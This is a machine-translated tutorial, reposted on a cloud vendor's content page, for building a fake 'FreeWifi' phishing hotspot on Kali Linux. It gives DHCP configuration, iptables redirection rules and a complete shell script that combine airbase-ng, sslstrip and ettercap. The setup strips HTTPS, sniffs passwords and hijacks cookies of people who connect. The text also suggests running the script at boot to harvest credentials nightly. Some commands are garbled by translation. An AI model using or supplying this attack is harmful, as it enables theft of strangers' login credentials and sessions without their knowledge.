Create a fishing WiFi hotspot under Kali-linux

Source: Internet
Author: User

Kali-linux the way to build a network bridge with Hostapd+bridge-utils to create a log of WiFi hotspots, interested in looking at different:
Create a WiFi hotspot (AP) using HOSTAPD under Kali-linux
One way to do this is to use Airbase-ng + DHCPD to create a virtual WiFi hotspot, use Sslstrip+ettercap for man-in-the-middle attacks, sniff users for Internet messages, and hijack cookie!
The required software is as follows; Kali-linux are already self-contained, other systems can be installed on their own:
Aircrack-ng Kit #用来发送数据
Isc-dhcp-server #简单的dhcp服务器
SSLstrip #突破ssl加密
Ettercap #嗅探劫持
leaf/etc/dhcp/dhcpd.conf Edit the DHCP server configuration file, modify the following:

authoritative;

Default-lease-time 700;
Max-lease-time 8000;

Subnet 10.0.0.0 netmask 255.255.255.0 {
Option routers 10.0.0.1;
Option Subnet-mask 255.255.255.0;

Option Domain-name "Freewifi";
Option Domain-name-servers 10.0.0.1;

Range 10.0.0.10 10.0.0.100;

}

Then activate the NIC to listening mode:
Airmon-ng Start Wlan0
AIRBASE-NG-E Freewifi-c 6 Mon0
At this point the virtual WiFi signal has been sent out, if there is an error:
Error:got Channel-1, expected a value > 0.
Execute the following command:

Airmon-ng Stop Mon0

Ifconfig wlan0 Down
Iwconfig wlan0 Mode Monitor
Ifconfig wlan0 up

Then start again from activating the NIC to listening mode.
Then execute the following command:

Ifconfig at0 up
Ifconfig at0 10.0.0.1 netmask 255.255.255.0
Ifconfig At0 MTU 1400
Route add-net 10.0.0.0 netmask 255.255.255.0 GW 10.0.0.1
Iptables--flush
Iptables--table Nat--flush
Iptables--delete-chain
Iptables--table Nat--delete-chain
Echo 1 >/proc/sys/net/ipv4/ip_forward
Iptables-t nat-a prerouting-p udp-j DNAT--to 192.168.1.1
Iptables-p FORWARD ACCEPT
Iptables--append FORWARD--in-interface at0-j ACCEPT
Iptables--table Nat--append postrouting--out-interface eth0-j Masquerade
Iptables-t nat-a prerouting-p tcp--destination-port 80-j REDIRECT--to-port 10000
Dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid At0
/etc/init.d/isc-dhcp-server start

The virtual Wifir hotspot was created successfully, followed by sniffing deception fishing:

SSLSTRIP-FPK 10000
Ettercap-tpuqi At0

Then just wait for the fish to bite!
Mobile phone test on the next, NetEase Mailbox direct plaintext Password:

Baidu uses encryption:

Write a script, modify it to your own settings each time the execution is OK:
Copy the following code, save as "fake_a_ap.sh", and then chmod +x fake_a_ap.sh &&./fake_a_ap.sh

#!/bin/sh

echo "is about to create a WiFi hotspot, make sure the DHCPD.CONF is configured!" "&
Sleep 5

Ifconfig wlan0 down #wlan0修改成你的网卡
Iwconfig wlan0 Mode Monitor
Ifconfig wlan0 up

Airmon-ng Start Wlan0 &
Sleep 5
AIRBASE-NG-E freewifi-c 6 Mon0 & #修改成自己的热点名称和信道
Sleep 5

Ifconfig at0 up
Ifconfig at0 10.0.0.1 netmask 255.255.255.0
Ifconfig At0 MTU 1400
Route add-net 10.0.0.0 netmask 255.255.255.0 GW 10.0.0.1
Iptables--flush && iptables--table nat--flush && iptables--table nat--flush && iptables--tab Le Nat--delete-chain &

Echo 1 >/proc/sys/net/ipv4/ip_forward
Iptables-t nat-a prerouting-p udp-j DNAT--to 192.168.1.1
Iptables-p FORWARD ACCEPT
Iptables--append FORWARD--in-interface at0-j ACCEPT
Iptables--table Nat--append postrouting--out-interface eth0-j Masquerade
Iptables-t nat-a prerouting-p tcp--destination-port 80-j REDIRECT--to-port 10000
Dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid At0
Sleep 2
/etc/init.d/isc-dhcp-server Start &
Sleep 5
SSLSTRIP-FPK 10000 &
ETTERCAP-PUTQI At0

Of course, it can be more lewd! Simply modify the Ettercap parameter of the script: set to save the packet locally, and then add the script to the "Launch application" or add a cron task to boot it with the system, And then no more: every day before bedtime open the packet check inside the USERNAME,PASSWD,COOKIE,,ETC,,,,

This article turns from http://xiao106347.blog.163.com/blog/static/215992078201463597381/,

Create a fishing WiFi hotspot under Kali-linux

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.